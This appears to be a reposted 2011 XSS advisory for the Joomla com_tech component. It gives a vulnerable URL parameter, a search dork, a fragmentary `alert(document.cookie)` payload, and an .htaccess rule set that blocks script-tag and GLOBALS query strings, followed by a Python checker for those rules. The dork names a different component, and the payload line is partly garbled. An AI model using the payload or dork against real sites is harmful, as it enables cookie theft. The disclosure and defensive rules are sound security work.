endLesS
Webmaster
<------------------- header data start ------------------- >
#############################################################
Joomla Component Com_tech XSS Vulnerability
#############################################################
# Author : [qrusher-] ~ Bug Researchers
# Date : 07.08.2011
# Name : Joomla com_tech
# Bug Type : XSS
# Infection : Access to information can be obtained.
# Example Vuln :
[+]/index.php?option=com_tech&task=categoria&id_categoria=[EXPLOIT]
[+] Dork:inurl: com_foto
[+] Demo: http://site/index.php?option=com_tech&task=
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
>**********alert(document.cookie)</script> // Post Search Box
< -- bug code end of -- >
< ------------------- header data end of ------------------- >
There are many alternatives, but if we edit the .htaccess file a little, the problem will go away.
< -- bug code start -- >
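Write the code below into your .htaccess file; your site will then return an error for any XSS
attack made against it.
# Enable mod_rewrite for this directory
RewriteEngine On
# Block query strings containing base64_encode(...)
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block <script> tags in the query string, raw or percent-encoded
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block attempts to set PHP GLOBALS or _REQUEST through the URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Answer matching requests with 403 Forbidden
RewriteRule ^(.*)$ index.php [F,L]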
< -- bug code end of -- >
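An offline check of the rule set above, added here as an example and not part of the original advisory: it applies the same four patterns to constructed query strings to confirm which requests the [F] rule would refuse. Python's `re` stands in for Apache's regex engine (an assumption that holds for these patterns); the function and sample names are hypothetical.

```python
import re

# The four RewriteCond patterns from the .htaccess block, as
# (regex, case_insensitive) pairs. Apache matches %{QUERY_STRING}
# without URL-decoding it, so %3C / %3E must be listed explicitly.
CONDITIONS = [
    (r"base64_encode.*\(.*\)", False),
    (r"(\<|%3C).*script.*(\>|%3E)", True),      # [NC]
    (r"GLOBALS(=|\[|\%[0-9A-Z]{0,2})", False),
    (r"_REQUEST(=|\[|\%[0-9A-Z]{0,2})", False),
]


def is_forbidden(query_string: str) -> bool:
    """True when any condition matches (the [OR] chain), i.e. when
    the RewriteRule would answer 403 through its [F] flag."""
    for pattern, nocase in CONDITIONS:
        flags = re.IGNORECASE if nocase else 0
        if re.search(pattern, query_string, flags):
            return True
    return False


# Constructed sample query strings (not real traffic), mapped to the
# result the rule set is expected to give.
SAMPLES = {
    "option=com_tech&task=categoria&id_categoria=5": False,
    "option=com_tech&id_categoria=<script>alert(1)</script>": True,
    "option=com_tech&id_categoria=%3CScRiPt%3Ealert(1)%3C/script%3E": True,
    "option=com_tech&GLOBALS[x]=1": True,
    "option=com_tech&_REQUEST=1": True,
    "option=com_tech&x=base64_encode(abc)": True,
}


def run_samples() -> dict:
    """Evaluate every constructed sample against the rule set."""
    return {qs: is_forbidden(qs) for qs in SAMPLES}


if __name__ == "__main__":
    for qs, blocked in run_samples().items():
        print("403" if blocked else "ok ", qs)
```

%{QUERY_STRING} holds only the part of the URL after `?`; input sent in a POST body, such as the search box noted above, is not inspected by these conditions.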